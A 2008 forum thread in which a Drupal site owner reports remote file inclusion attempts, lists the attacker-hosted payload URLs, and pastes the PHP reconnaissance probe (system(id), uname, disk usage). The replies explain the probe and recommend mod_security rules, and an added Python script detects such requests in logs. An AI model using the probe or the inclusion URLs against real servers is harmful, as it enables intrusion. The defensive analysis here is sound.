

Hacking Attempt on site




Posted by gdtechind, 07-20-2008, 04:20 AM
Hi Everyone,

I am having an issue with my server. Someone is trying to execute some code and possibly trying the MySQL injection method. I have pasted the code below. Please suggest what can be done in this case.

Regards
Gagandeep

+++++++++++
The person tried to use different IPs and different websites to execute the code.

URL >> IP
http://www.teamfatalz.com/rfi/id.txt???? >> 62.112.193.46
http://www.larisco.com/id.txt?? >> 200.11.67.242
http://lei.crt-limousin.fr/ortl/lag/id.txt?? >> 78.111.68.37
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156

There are many such queries under my logs. The person is using different IPs, so I can't even block that many IPs.

++++++++++++
The CODE

= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..";
echo "uname -a: $un";
echo "os: $os";
echo "id: $id1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit; ?>

Posted by CodyRo, 07-20-2008, 04:30 AM
Is that the code that's being executed? If so it's basically telling him basic server info (space available, space used, machine name) and allowing him to execute system commands by using the system() PHP function. It looks like a file inclusion exploit - which are fairly common. A simple mod_security rule should prevent them (beyond fixing the scripts themselves).
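
The requests described in this thread put a remote URL into a query parameter, so they can be found by that pattern rather than by client IP. The following is an added example, not part of the original thread or anyone's posted rules: it scans access-log lines for parameters whose decoded value starts with http://, https:// or ftp://, then groups the hits by payload host. The log lines, client IPs, hosts, paths and parameter names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Apache combined-style). Client IPs, hosts,
# paths and parameter names are invented for this example.
SAMPLE_LOG = '''\
192.0.2.10 - - [20/Jul/2008:04:01:10 +0000] "GET /index.php?page=http://payload.example/id.txt???? HTTP/1.1" 404 512
192.0.2.77 - - [20/Jul/2008:04:01:42 +0000] "GET /?q=http%3A%2F%2Fpayload.example%2Fid.txt%3F%3F HTTP/1.1" 200 8120
203.0.113.5 - - [20/Jul/2008:04:02:03 +0000] "GET /index.php?inc=ftp://198.51.100.7/tmp/x/1? HTTP/1.1" 404 512
203.0.113.9 - - [20/Jul/2008:04:02:30 +0000] "GET /?q=node/12 HTTP/1.1" 200 9310
'''

# client IP, request target and status code from one log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# a parameter value that is itself a remote URL
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)

def find_rfi_attempts(log_text):
    """Return (client_ip, parameter, payload_host, status) for each hit."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        _, _, query = target.partition("?")
        # parse_qsl percent-decodes, so encoded payload URLs are caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if REMOTE_RE.match(value):
                hits.append((client, name, urlsplit(value).hostname, int(status)))
    return hits

def group_by_payload_host(hits):
    """Map payload host -> sorted client IPs that requested it."""
    grouped = defaultdict(set)
    for client, _, host, _ in hits:
        grouped[host].add(client)
    return {host: sorted(clients) for host, clients in grouped.items()}

if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG)
    for host, clients in group_by_payload_host(hits).items():
        print(f"{host}: {len(clients)} client IP(s): {', '.join(clients)}")
    # A 200 only means a page was served; those requests deserve a closer look
    print("answered 200:", [h for h in hits if h[3] == 200])
```

Legitimate parameters that carry URLs (redirect targets, for example) will also match, so review the flagged parameter names before turning the pattern into a blocking rule.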

Posted by gdtechind, 07-20-2008, 04:39 AM
Can you please tell me a bit more about the mod_security rule and how I can implement it? The site is based on Drupal and I have already updated to the latest versions after the recent security updates. Thanks for a response.

Posted by CodyRo, 07-20-2008, 04:47 AM
Here is something similar to what I use - if you want to focus on the inclusion attacks just ctrl+f "inclusion" - note that there are several of them.

Posted by gdtechind, 07-20-2008, 04:52 AM
Thanks again for the help. I am not sure what the person wants to achieve, but so far he hasn't been able to get into the system.

Posted by CodyRo, 07-20-2008, 04:59 AM
It's unlikely they will as long as everything is up to date. There's a good chance it's an old exploit some script kiddie is trying, or even some sort of "security scanner". Anywho, good luck!


